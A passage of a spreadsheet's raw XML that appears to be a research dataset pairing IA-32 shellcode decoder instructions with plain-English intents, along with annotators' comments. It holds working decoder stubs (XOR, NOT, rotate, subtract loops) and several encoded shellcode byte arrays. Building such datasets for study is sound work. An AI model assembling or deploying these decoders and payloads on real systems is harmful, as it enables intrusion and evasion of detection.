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pietroliguori/Downloads/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A53C6E57-A020-6D4A-83A5-AB0726CE9D87}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="25600" windowHeight="14380" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Assembly Decoders" sheetId="4" r:id="rId1"/>
    <sheet name="Python Encoders" sheetId="5" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="AK91" i="5" l="1"/>
  <c r="AM90" i="5"/>
  <c r="AI90" i="5"/>
  <c r="AG90" i="5"/>
  <c r="AE90" i="5"/>
  <c r="AC90" i="5"/>
  <c r="AA90" i="5"/>
  <c r="Y90" i="5"/>
  <c r="W90" i="5"/>
  <c r="U90" i="5"/>
  <c r="S90" i="5"/>
  <c r="Q90" i="5"/>
  <c r="O90" i="5"/>
  <c r="M90" i="5"/>
  <c r="K90" i="5"/>
  <c r="I90" i="5"/>
  <c r="G90" i="5"/>
  <c r="E90" i="5"/>
  <c r="C90" i="5"/>
  <c r="A90" i="5"/>
  <c r="AO90" i="5" s="1"/>
  <c r="AM70" i="4"/>
  <c r="AK70" i="4"/>
  <c r="AI70" i="4"/>
  <c r="AG70" i="4"/>
  <c r="AE70" i="4"/>
  <c r="AC70" i="4"/>
  <c r="AA70" i="4"/>
  <c r="Y70" i="4"/>
  <c r="W70" i="4"/>
  <c r="U70" i="4"/>
  <c r="S70" i="4"/>
  <c r="Q70" i="4"/>
  <c r="O70" i="4"/>
  <c r="M70" i="4"/>
  <c r="K70" i="4"/>
  <c r="I70" i="4"/>
  <c r="G70" i="4"/>
  <c r="E70" i="4"/>
  <c r="C70" i="4"/>
  <c r="A70" i="4"/>
  <c r="AO70" i="4" s="1"/>
  <c r="AO7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9" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000002000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
          </rPr>
          <t>I added this assignment to simplify the description of the following operations
	-Pietro Liguori</t>
        </r>
      </text>
    </comment>
    <comment ref="Q10" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000001000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
          </rPr>
          <t>same here
	-Pietro Liguori</t>
        </r>
      </text>
    </comment>
    <comment ref="AN12" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000006000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">else if total equals 2
</t>
        </r>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">	-Erfan Al-Hossami</t>
        </r>
      </text>
    </comment>
    <comment ref="AN31" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000003000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
          </rPr>
          <t>Maybe can do this (and other convoluted snippets like this) as a multi-line intent OR multi-line snippet &amp; multi-line intent?
	-Erfan Al-Hossami
What do you think?@pie.liguori@gmail.com
	-Erfan Al-Hossami
Yes, I do agree. We will discuss these cases in our next meeting
	-Pietro Liguori</t>
        </r>
      </text>
    </comment>
    <comment ref="AN50" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000005000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
          </rPr>
          <t>does this make sense?
	-Erfan Al-Hossami
maybe it is not so close to a human annotation
	-Pietro Liguori</t>
        </r>
      </text>
    </comment>
    <comment ref="AM51" authorId="0" shapeId="0" xr:uid="{00000000-0006-0000-0400-000004000000}">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <color rgb="FF000000"/>
            <rFont val="Arial"/>
          </rPr>
          <t>would it be safe to remove semicolons? Python 2 and 3 don't use semicolons
	-Erfan Al-Hossami</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2235" uniqueCount="1494">
  <si>
    <t>Shellcode_01</t>
  </si>
  <si>
    <t>Shellcode_02</t>
  </si>
  <si>
    <t>Shellcode_03</t>
  </si>
  <si>
    <t>Shellcode_04</t>
  </si>
  <si>
    <t>Shellcode_05</t>
  </si>
  <si>
    <t>Shellcode_06</t>
  </si>
  <si>
    <t>Shellcode_07</t>
  </si>
  <si>
    <t>Shellcode_08</t>
  </si>
  <si>
    <t>Shellcode_09</t>
  </si>
  <si>
    <t>Shellcode_10</t>
  </si>
  <si>
    <t>Shellcode_11</t>
  </si>
  <si>
    <t>Shellcode_12</t>
  </si>
  <si>
    <t>Shellcode_13</t>
  </si>
  <si>
    <t>Shellcode_14</t>
  </si>
  <si>
    <t>Shellcode_15</t>
  </si>
  <si>
    <t>Shellcode_16</t>
  </si>
  <si>
    <t>Shellcode_17</t>
  </si>
  <si>
    <t>Shellcode_18</t>
  </si>
  <si>
    <t>Shellcode_19</t>
  </si>
  <si>
    <t>Shellcode_20</t>
  </si>
  <si>
    <t>Snippets</t>
  </si>
  <si>
    <t>Intents</t>
  </si>
  <si>
    <t>global _start</t>
  </si>
  <si>
    <t>global _start:</t>
  </si>
  <si>
    <t>lobal _start</t>
  </si>
  <si>
    <t>section .text</t>
  </si>
  <si>
    <t>section text</t>
  </si>
  <si>
    <t>_start:</t>
  </si>
  <si>
    <t>define the start label and jump short to the call_shellcode</t>
  </si>
  <si>
    <t>define the start label and jump short to the call_decoder</t>
  </si>
  <si>
    <t>define the start label and jump to the call_decoder</t>
  </si>
  <si>
    <t>define the start label and jump short to enc</t>
  </si>
  <si>
    <t>define the start label and jump short to call_decoder</t>
  </si>
  <si>
    <t>define the start label and jump short to call_shellcode</t>
  </si>
  <si>
    <t>define the start label and jump short to stage</t>
  </si>
  <si>
    <t>define the _start label and jump to call_decoder</t>
  </si>
  <si>
    <t>define the _start label and jump short to call_shellcode</t>
  </si>
  <si>
    <t>_start label</t>
  </si>
  <si>
    <t xml:space="preserve">_start </t>
  </si>
  <si>
    <t>jmp short call_shellcode</t>
  </si>
  <si>
    <t>jmp short call_decoder</t>
  </si>
  <si>
    <t>jmp call_decoder</t>
  </si>
  <si>
    <t>jmp  call_decoder</t>
  </si>
  <si>
    <t>jmp    call_decoder</t>
  </si>
  <si>
    <t>jmp short enc</t>
  </si>
  <si>
    <t>jmp short stage</t>
  </si>
  <si>
    <t>xor   eax, eax</t>
  </si>
  <si>
    <t>zero out eax, ebx, ecx and edx</t>
  </si>
  <si>
    <t>jmp short shellcode_section</t>
  </si>
  <si>
    <t>go to shellcode_section</t>
  </si>
  <si>
    <t>go to call_shellcode</t>
  </si>
  <si>
    <t>jump short to call_shellcode</t>
  </si>
  <si>
    <t>jump short to call_decoder</t>
  </si>
  <si>
    <t>jmp short get_shellcode_addr</t>
  </si>
  <si>
    <t>jump short to get_shellcode_addr</t>
  </si>
  <si>
    <t>xor   ebx, ebx</t>
  </si>
  <si>
    <t>decoder:</t>
  </si>
  <si>
    <t>define the decoder function and store the encoded shellcode pointer in the esi register</t>
  </si>
  <si>
    <t>define the decoder function</t>
  </si>
  <si>
    <t>decoder function</t>
  </si>
  <si>
    <t>decoder routine</t>
  </si>
  <si>
    <t>decoder</t>
  </si>
  <si>
    <t>define decoder</t>
  </si>
  <si>
    <t>in the decoder routine save the shellcode in esi</t>
  </si>
  <si>
    <t>in deocoder save the shellcode in esi and move it to edi</t>
  </si>
  <si>
    <t>xor   ecx, ecx</t>
  </si>
  <si>
    <t>decoder's main</t>
  </si>
  <si>
    <t>decoder_setup:</t>
  </si>
  <si>
    <t>decoder_setup label</t>
  </si>
  <si>
    <t>ReturnLabel:</t>
  </si>
  <si>
    <t>ReturnLabel label</t>
  </si>
  <si>
    <t>decoder label</t>
  </si>
  <si>
    <t>pop esi</t>
  </si>
  <si>
    <t>lea edi, [esi]</t>
  </si>
  <si>
    <t>load the address of esi into edi</t>
  </si>
  <si>
    <t>pop    esi</t>
  </si>
  <si>
    <t>xor ecx, ecx</t>
  </si>
  <si>
    <t>zero out eax and edx registers</t>
  </si>
  <si>
    <t>store encoded_shellcode pointer in ESI</t>
  </si>
  <si>
    <t>shellcode on ESI</t>
  </si>
  <si>
    <t>shellcode address in esi</t>
  </si>
  <si>
    <t>xor   edx, edx</t>
  </si>
  <si>
    <t>load address of our encoded shellcode (encoded_shellcode) into ESI</t>
  </si>
  <si>
    <t>xor eax, eax</t>
  </si>
  <si>
    <t>clear eax, ebx, ecx and edx registers</t>
  </si>
  <si>
    <t>pop shellcode into esi</t>
  </si>
  <si>
    <t>Store address of shellcode in esi</t>
  </si>
  <si>
    <t>store the encoder in esi</t>
  </si>
  <si>
    <t>Address of EncodedShellcode to ESI</t>
  </si>
  <si>
    <t>zero out the ecx register and move 25 in the lower 8 bits of the register</t>
  </si>
  <si>
    <t>clear the eax and the ebx registers</t>
  </si>
  <si>
    <t>lea edi, [esi + 13]</t>
  </si>
  <si>
    <t xml:space="preserve">load the address at esi + 13 into edi </t>
  </si>
  <si>
    <t>lea    edi,[esi+0x1]</t>
  </si>
  <si>
    <t>load the address of esi+0x1 into edi</t>
  </si>
  <si>
    <t>xor    ecx, ecx</t>
  </si>
  <si>
    <t>zero out the ecx register and move 0x19 into the lower byte of the register</t>
  </si>
  <si>
    <t>mul ecx</t>
  </si>
  <si>
    <t>push esi</t>
  </si>
  <si>
    <t>push encoded_shellcode pointer to stack for later execution</t>
  </si>
  <si>
    <t>zero out the loop counter and move shellcode_length in the first byte</t>
  </si>
  <si>
    <t>mov al, byte [esi]</t>
  </si>
  <si>
    <t>shellcode length in al</t>
  </si>
  <si>
    <t>clear the counter and move 0x1e into the first byte of the register</t>
  </si>
  <si>
    <t>mov edi, esi</t>
  </si>
  <si>
    <t>mov   dl, 0x45</t>
  </si>
  <si>
    <t>move 0x45 to dl</t>
  </si>
  <si>
    <t>trick to clear eax and exc</t>
  </si>
  <si>
    <t>xor ebx, ebx</t>
  </si>
  <si>
    <t>zero out the ecx register and move 23 into the lower byte of the register</t>
  </si>
  <si>
    <t>clear the eax register and move 22 into the lower byte of the register</t>
  </si>
  <si>
    <t>xor edi, edi</t>
  </si>
  <si>
    <t>zero out the edi, eax, ebx and edx registers</t>
  </si>
  <si>
    <t>Load effective address of what is contained on EDI</t>
  </si>
  <si>
    <t>mov cl, 25</t>
  </si>
  <si>
    <t>clear ecx and eax</t>
  </si>
  <si>
    <t>xor    eax, eax</t>
  </si>
  <si>
    <t>clear the eax register and move 0x1 in the lowest byte of the register</t>
  </si>
  <si>
    <t>mov    cl, 0x19</t>
  </si>
  <si>
    <t>store the shellcode in esi and move it into cx</t>
  </si>
  <si>
    <t>move encoded_shellcode pointer to EDI</t>
  </si>
  <si>
    <t>mov cl, shellcode_length</t>
  </si>
  <si>
    <t>clear ecx register</t>
  </si>
  <si>
    <t>mov    cl, 0x1e</t>
  </si>
  <si>
    <t>jmp   short call_decoder</t>
  </si>
  <si>
    <t>mov cl, 10</t>
  </si>
  <si>
    <t>move 10 into the first byte of the counter</t>
  </si>
  <si>
    <t>decode:</t>
  </si>
  <si>
    <t>decode function</t>
  </si>
  <si>
    <t>mov cl, 23</t>
  </si>
  <si>
    <t>mov al, 22</t>
  </si>
  <si>
    <t>cause both EAX and EDX to become zero</t>
  </si>
  <si>
    <t>mov    al, 0x1</t>
  </si>
  <si>
    <t>mov cx,[esi]</t>
  </si>
  <si>
    <t>in decode move the current byte of the shellcode in the bl register</t>
  </si>
  <si>
    <t>xor edx, edx</t>
  </si>
  <si>
    <t>cmp byte [esi], 0x88</t>
  </si>
  <si>
    <t>compare current esi byte with 0x88 and jump to shellcode label if compare succeds</t>
  </si>
  <si>
    <t>zero out the ebx register and move the next byte of the shellcode into the lower byte of the register</t>
  </si>
  <si>
    <t>define decode function and subtract 13 from the current byte of the shellcode</t>
  </si>
  <si>
    <t>define the decode label</t>
  </si>
  <si>
    <t>switch:</t>
  </si>
  <si>
    <t>define the switch function</t>
  </si>
  <si>
    <t>mov edx, esp</t>
  </si>
  <si>
    <t>point edx to the stack pointer</t>
  </si>
  <si>
    <t>xor    ebx, ebx</t>
  </si>
  <si>
    <t>zero out the ebx register</t>
  </si>
  <si>
    <t>define the decoder function and perform the xor operation between the byte in esi and the 0xaa value</t>
  </si>
  <si>
    <t>define the decoder function and negate the byte in esi</t>
  </si>
  <si>
    <t>inc esi</t>
  </si>
  <si>
    <t>point to the next word in esi</t>
  </si>
  <si>
    <t>decode routine</t>
  </si>
  <si>
    <t>check_even_odd:</t>
  </si>
  <si>
    <t>define check_even_odd</t>
  </si>
  <si>
    <t>in the decode function jump to lowbound label if the current byte of the shellcode is lower than 0x7 else subtract 0x7 from the byte of the shellcode and jump to common_commands</t>
  </si>
  <si>
    <t>mov bl, byte [esi]</t>
  </si>
  <si>
    <t>decode_loop:</t>
  </si>
  <si>
    <t>decode_loop</t>
  </si>
  <si>
    <t>get the address of shellcode</t>
  </si>
  <si>
    <t>jz shellcode</t>
  </si>
  <si>
    <t>mov bl, [esi+1]</t>
  </si>
  <si>
    <t>sub byte [esi], 13</t>
  </si>
  <si>
    <t>xor ebp, ebp</t>
  </si>
  <si>
    <t>Zero the value on EBP</t>
  </si>
  <si>
    <t>sub byte [esi], 8</t>
  </si>
  <si>
    <t>subtract 8 from the curent byte of the shellcode and then negate the result</t>
  </si>
  <si>
    <t>mov bl, byte [esi + eax]</t>
  </si>
  <si>
    <t>move the byte at the address esi + eax into bl</t>
  </si>
  <si>
    <t>mov cl, 13</t>
  </si>
  <si>
    <t>move 13 to cl</t>
  </si>
  <si>
    <t>xor    BYTE [esi], 0xaa</t>
  </si>
  <si>
    <t>not    BYTE [esi]</t>
  </si>
  <si>
    <t>mov ax, [esi]</t>
  </si>
  <si>
    <t>move current word from encoded_shellcode to AX</t>
  </si>
  <si>
    <t>test  esi, 01h</t>
  </si>
  <si>
    <t>jump to even_number is the contents in esi is even</t>
  </si>
  <si>
    <t>mov bl, byte [esi+ecx+1]</t>
  </si>
  <si>
    <t>move the byte at the addrss in esi+ecx+1 in bl and subtract 0x7</t>
  </si>
  <si>
    <t>cmp    BYTE [esi],0x7</t>
  </si>
  <si>
    <t>xor bl, 0xBB</t>
  </si>
  <si>
    <t>perform the xor between bl and 0xBB and jump to formatting if is zero else move the byte of the shellcode in cl</t>
  </si>
  <si>
    <t>pop   esi</t>
  </si>
  <si>
    <t>store the shellcode pointer to esi</t>
  </si>
  <si>
    <t>mov  al, byte [esi]</t>
  </si>
  <si>
    <t>load encoded_shellcode's byte pointed by ESI in al</t>
  </si>
  <si>
    <t>mov edi, 0xaaaa9090</t>
  </si>
  <si>
    <t>move 0xaaaa9090 to edi</t>
  </si>
  <si>
    <t>not byte [esi]</t>
  </si>
  <si>
    <t>NOT operation of current byte in esi</t>
  </si>
  <si>
    <t>clear the edx register and move the current byte of the shellcode into the lower byte of the register</t>
  </si>
  <si>
    <t>dec al</t>
  </si>
  <si>
    <t>decrement the al register and jump to shellcode if the result is zero</t>
  </si>
  <si>
    <t>mov dl, byte [esi]</t>
  </si>
  <si>
    <t>Put the LEADER byte to DL</t>
  </si>
  <si>
    <t>cmp bl, 0xaa</t>
  </si>
  <si>
    <t>jump to shellcode if bl is equal to 0xaa</t>
  </si>
  <si>
    <t>inc    esi</t>
  </si>
  <si>
    <t>point to the next byte in esi</t>
  </si>
  <si>
    <t>mov bx, [esi]</t>
  </si>
  <si>
    <t>move esi into bx</t>
  </si>
  <si>
    <t>xor ax, 0x539</t>
  </si>
  <si>
    <t>XOR encoded_shellcode with 1337, one word at a time</t>
  </si>
  <si>
    <t>je even_number</t>
  </si>
  <si>
    <t>sub bl, 0x7</t>
  </si>
  <si>
    <t>jl     lowbound</t>
  </si>
  <si>
    <t>jz formatting</t>
  </si>
  <si>
    <t>lea   edi, [esi]</t>
  </si>
  <si>
    <t>point edi to the start of the shellcode</t>
  </si>
  <si>
    <t>xchg byte [esi+1], al</t>
  </si>
  <si>
    <t>swap al value with next byte value (ESI+1)</t>
  </si>
  <si>
    <t>sub esp, 0x7f</t>
  </si>
  <si>
    <t>subtract 0x7f from the stack</t>
  </si>
  <si>
    <t>add byte [esi], 0x02</t>
  </si>
  <si>
    <t>ADD 0x02 to the current byte in esi</t>
  </si>
  <si>
    <t>mov dl, [esi]</t>
  </si>
  <si>
    <t>decode label</t>
  </si>
  <si>
    <t>mov al, dl</t>
  </si>
  <si>
    <t>Copy the LEADER to AL</t>
  </si>
  <si>
    <t>function decode</t>
  </si>
  <si>
    <t>mov    bl, BYTE [esi+eax*1]</t>
  </si>
  <si>
    <t>move the byte at the address esi+eax*1 into bl</t>
  </si>
  <si>
    <t>loop   decode</t>
  </si>
  <si>
    <t>decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the Shellcode label</t>
  </si>
  <si>
    <t>decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the EncodedShellcode label</t>
  </si>
  <si>
    <t>jz decoded_shellcode</t>
  </si>
  <si>
    <t>if zero jump to decoded_shellcode</t>
  </si>
  <si>
    <t>mov byte [esi+ecx], bl</t>
  </si>
  <si>
    <t>move bl into the byte in esi+ecx</t>
  </si>
  <si>
    <t>sub    BYTE [esi],0x7</t>
  </si>
  <si>
    <t>mov cl, byte [esi]</t>
  </si>
  <si>
    <t>mov [esi], al</t>
  </si>
  <si>
    <t>xor byte [esi], 0x97</t>
  </si>
  <si>
    <t>XOR between current byte in esi and 0x97</t>
  </si>
  <si>
    <t>xor byte [esi+1], dl</t>
  </si>
  <si>
    <t>perform the xor between the next byte of the shellcode and the dl register</t>
  </si>
  <si>
    <t>point to the next byte of the shellcode</t>
  </si>
  <si>
    <t>mov bl, byte [esi + edi]</t>
  </si>
  <si>
    <t>move the byte at the address esi+edi into bl</t>
  </si>
  <si>
    <t>shr dl, 4</t>
  </si>
  <si>
    <t xml:space="preserve">Keep only the 4 high bits of LEADER to DL </t>
  </si>
  <si>
    <t>loop decode</t>
  </si>
  <si>
    <t>decrement the counter and jump to the decode label if is not zero else jump short to the EncodedShellcode label</t>
  </si>
  <si>
    <t>cmp bl, 0xbb</t>
  </si>
  <si>
    <t>jump to xordecode if bl is equal to 0xbb else jump to notdecode</t>
  </si>
  <si>
    <t>get the byte from esi and save it in bl</t>
  </si>
  <si>
    <t>xor    bl, 0xaa</t>
  </si>
  <si>
    <t>perform xor between bl anx 0xaa and jump to EncodedShellcode if the result is not zero</t>
  </si>
  <si>
    <t>jmp    Shellcode</t>
  </si>
  <si>
    <t>jmp    EncodedShellcode</t>
  </si>
  <si>
    <t>shr ax, 1</t>
  </si>
  <si>
    <t>shift encoded_shellcode to right by one bit, one word at a time</t>
  </si>
  <si>
    <t>odd_number:</t>
  </si>
  <si>
    <t>define odd_number</t>
  </si>
  <si>
    <t>inc ecx</t>
  </si>
  <si>
    <t>point to the next position in ecx</t>
  </si>
  <si>
    <t>jmp    common_commands</t>
  </si>
  <si>
    <t>xor cl, 0XAA</t>
  </si>
  <si>
    <t>perform xor between cl and 0xAA and jump to shift decode if the result is zero</t>
  </si>
  <si>
    <t>add esi, 2</t>
  </si>
  <si>
    <t>add 2 to the contents of esi</t>
  </si>
  <si>
    <t>subtract 0x7f from esp</t>
  </si>
  <si>
    <t>add byte [esi], 0x10</t>
  </si>
  <si>
    <t>ADD 0x10 to the current byte in esi</t>
  </si>
  <si>
    <t>mov dl, [esi+1]</t>
  </si>
  <si>
    <t>move the contents of the address esi+1 into dl</t>
  </si>
  <si>
    <t>jmp short decode</t>
  </si>
  <si>
    <t>jump short to decode</t>
  </si>
  <si>
    <t>mov dl, byte [esi + edi + 1]</t>
  </si>
  <si>
    <t>move the byte at the address esi+edi+1 into dl</t>
  </si>
  <si>
    <t>shl eax, 28</t>
  </si>
  <si>
    <t>shift left 28 bits of EAX which contains the value of Leader on al</t>
  </si>
  <si>
    <t>jmp short EncodedShellcode</t>
  </si>
  <si>
    <t>jz xordecode</t>
  </si>
  <si>
    <t>dec ebx</t>
  </si>
  <si>
    <t>decrease ebx by 1</t>
  </si>
  <si>
    <t>jne EncodedShellcode</t>
  </si>
  <si>
    <t>push the stack onto esi and move the contents on edi</t>
  </si>
  <si>
    <t>sub ax, 13</t>
  </si>
  <si>
    <t>substract 13 from encoded_shellcode, one word at a time</t>
  </si>
  <si>
    <t>rol byte [esi], 0x1</t>
  </si>
  <si>
    <t>left rotate the shellcode by one</t>
  </si>
  <si>
    <t>cmp al, cl</t>
  </si>
  <si>
    <t>jump short to decode if al is not equal to cl esle jump to shellcode</t>
  </si>
  <si>
    <t>jz shift_decode</t>
  </si>
  <si>
    <t>mov   bl, byte [edi + ecx]</t>
  </si>
  <si>
    <t>move the byte at the address edi+ecx into bl</t>
  </si>
  <si>
    <t>loop decode_loop</t>
  </si>
  <si>
    <t>decrement the counter and if it is not zero go back at decode_loop and execute the cicle again else jump to encoded_shellcode</t>
  </si>
  <si>
    <t>xor byte [esi], 0x88</t>
  </si>
  <si>
    <t>XOR between the current byte in esi and 0x88</t>
  </si>
  <si>
    <t>xor byte [esi], dl</t>
  </si>
  <si>
    <t>perform the xor between the current byte of the shellcode and the dl register</t>
  </si>
  <si>
    <t>xor bl, dl</t>
  </si>
  <si>
    <t>perform xor between bl and dl and jump short to shellcode if the result is not zero</t>
  </si>
  <si>
    <t>shr eax, 28</t>
  </si>
  <si>
    <t xml:space="preserve">shift right 28 of EAX </t>
  </si>
  <si>
    <t>jmp notdecode</t>
  </si>
  <si>
    <t>mov byte[edx + eax], bl</t>
  </si>
  <si>
    <t>move bl into the byte in edx + eax</t>
  </si>
  <si>
    <t>mov    bl, BYTE [esi+eax*1+0x1]</t>
  </si>
  <si>
    <t>move the byte at the address esi+eax*1 into bl and move bl into the byte in edi</t>
  </si>
  <si>
    <t>call_decoder:</t>
  </si>
  <si>
    <t>define the call_decoder label and call the decoder function</t>
  </si>
  <si>
    <t>mov [edi], al</t>
  </si>
  <si>
    <t>move decoded byte to EDI</t>
  </si>
  <si>
    <t>jmp short inc_dec</t>
  </si>
  <si>
    <t>jump short to inc_dec</t>
  </si>
  <si>
    <t>jnz short decode</t>
  </si>
  <si>
    <t>lowbound:</t>
  </si>
  <si>
    <t xml:space="preserve">lowbound label </t>
  </si>
  <si>
    <t>point to the next byte of the shellcode and jump short to decode</t>
  </si>
  <si>
    <t>mov   bh, bl</t>
  </si>
  <si>
    <t>move bl to bh</t>
  </si>
  <si>
    <t>jmp short encoded_shellcode</t>
  </si>
  <si>
    <t>move to next byte in esi</t>
  </si>
  <si>
    <t>lea esi, [esi+2]</t>
  </si>
  <si>
    <t>load the effective address of esi+2 into esi</t>
  </si>
  <si>
    <t>get_shellcode_addr:</t>
  </si>
  <si>
    <t>get_shell_code_addr function</t>
  </si>
  <si>
    <t>jz short shellcode</t>
  </si>
  <si>
    <t>sub dl, al</t>
  </si>
  <si>
    <t>subtract AL from DL and jump to decode_pr if the sign flag is zero</t>
  </si>
  <si>
    <t>call_shellcode:</t>
  </si>
  <si>
    <t>define the call_shellcode label and call the decoder function</t>
  </si>
  <si>
    <t>inc eax</t>
  </si>
  <si>
    <t>point to the next byte in eax</t>
  </si>
  <si>
    <t>mov    BYTE [edi], bl</t>
  </si>
  <si>
    <t>call decoder</t>
  </si>
  <si>
    <t>call   decoder</t>
  </si>
  <si>
    <t>point to the next encoded_shellcode word</t>
  </si>
  <si>
    <t>jmp shellcode</t>
  </si>
  <si>
    <t>clear the ebx and edx registers</t>
  </si>
  <si>
    <t>mov   al, dl</t>
  </si>
  <si>
    <t>move dl to al</t>
  </si>
  <si>
    <t>jump back to start of decode</t>
  </si>
  <si>
    <t>mov dl, [esi-1]</t>
  </si>
  <si>
    <t>move the address of esi-1 into dl</t>
  </si>
  <si>
    <t>call ReturnLabel</t>
  </si>
  <si>
    <t>mov cl, dl</t>
  </si>
  <si>
    <t>move cl into dl</t>
  </si>
  <si>
    <t>jns decode_pr</t>
  </si>
  <si>
    <t>xordecode:</t>
  </si>
  <si>
    <t>define xordecode</t>
  </si>
  <si>
    <t>mov bl, byte [edi]</t>
  </si>
  <si>
    <t>get the byte from edi and save it in bl</t>
  </si>
  <si>
    <t>inc    edi</t>
  </si>
  <si>
    <t>point to the next byte in edi</t>
  </si>
  <si>
    <t>Shellcode: db 0xeb,0x0d,0x5e,0x31,0xc9,0xb1,0x19,0x80,0x36,0xaa,0x46,0xe2,0xfa,0xeb,0x05,0xe8,0xee,0xff,0xff,0xff,0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a</t>
  </si>
  <si>
    <t>define the array of bytes Shellcode and initialize it to 0xeb,0x0d,0x5e,0x31,0xc9,0xb1,0x19,0x80,0x36,0xaa,0x46,0xe2,0xfa,0xeb,0x05,0xe8,0xee,0xff,0xff,0xff,0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a</t>
  </si>
  <si>
    <t>EncodedShellcode: db 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f</t>
  </si>
  <si>
    <t>define the array of bytes EncodedShellcode and initialize it to 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f</t>
  </si>
  <si>
    <t>main:</t>
  </si>
  <si>
    <t>main function</t>
  </si>
  <si>
    <t>even_number:</t>
  </si>
  <si>
    <t>define even_number</t>
  </si>
  <si>
    <t>xor    edx, edx</t>
  </si>
  <si>
    <t>xor   al, bl</t>
  </si>
  <si>
    <t>perform xor between al and bl and jump short to shellcode if the result is zero</t>
  </si>
  <si>
    <t>shellcode_section:</t>
  </si>
  <si>
    <t>in shellcode_section go to decoder's main</t>
  </si>
  <si>
    <t>mov bl, byte [esi + edx + 1]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+1 in bl</t>
  </si>
  <si>
    <t>shellcode: db  0x3e, 0xcd, 0x5d, 0x96, 0xef, 0x75, 0x3c, 0x3c, 0x80, 0x75, 0x75, 0x3c, 0x6f, 0x76, 0x7b, 0x96, 0xf0, 0x5d, 0xbd, 0x18, 0xda, 0x8d</t>
  </si>
  <si>
    <t>define the array of bytes shellcode 0x3e, 0xcd, 0x5d, 0x96, 0xef, 0x75, 0x3c, 0x3c, 0x80, 0x75, 0x75, 0x3c, 0x6f, 0x76, 0x7b, 0x96, 0xf0, 0x5d, 0xbd, 0x18, 0xda, 0x8d</t>
  </si>
  <si>
    <t>ror bl, cl</t>
  </si>
  <si>
    <t>right rotate bl by the contents of cl</t>
  </si>
  <si>
    <t>EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87</t>
  </si>
  <si>
    <t>define the array of bytes EncodedShellcode and initialize it to 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87</t>
  </si>
  <si>
    <t>mov bl, byte [esi + eax + 1]</t>
  </si>
  <si>
    <t>move the byte at the address esi + eax +1 into bl</t>
  </si>
  <si>
    <t>add    al, 0x2</t>
  </si>
  <si>
    <t>add 0x2 to al</t>
  </si>
  <si>
    <t>mov ax,[esi]</t>
  </si>
  <si>
    <t>move esi into ax</t>
  </si>
  <si>
    <t>inc edi</t>
  </si>
  <si>
    <t>point to the next decoded_shellcode byte</t>
  </si>
  <si>
    <t>ror byte [esi], 0x1</t>
  </si>
  <si>
    <t>right rotate the shellcode in esi by one</t>
  </si>
  <si>
    <t>stage:</t>
  </si>
  <si>
    <t>define stage and call decoder function</t>
  </si>
  <si>
    <t>mov    bl, 0x7</t>
  </si>
  <si>
    <t>move 0x7 to bl</t>
  </si>
  <si>
    <t>shift_decode:</t>
  </si>
  <si>
    <t>define shift_decode routine</t>
  </si>
  <si>
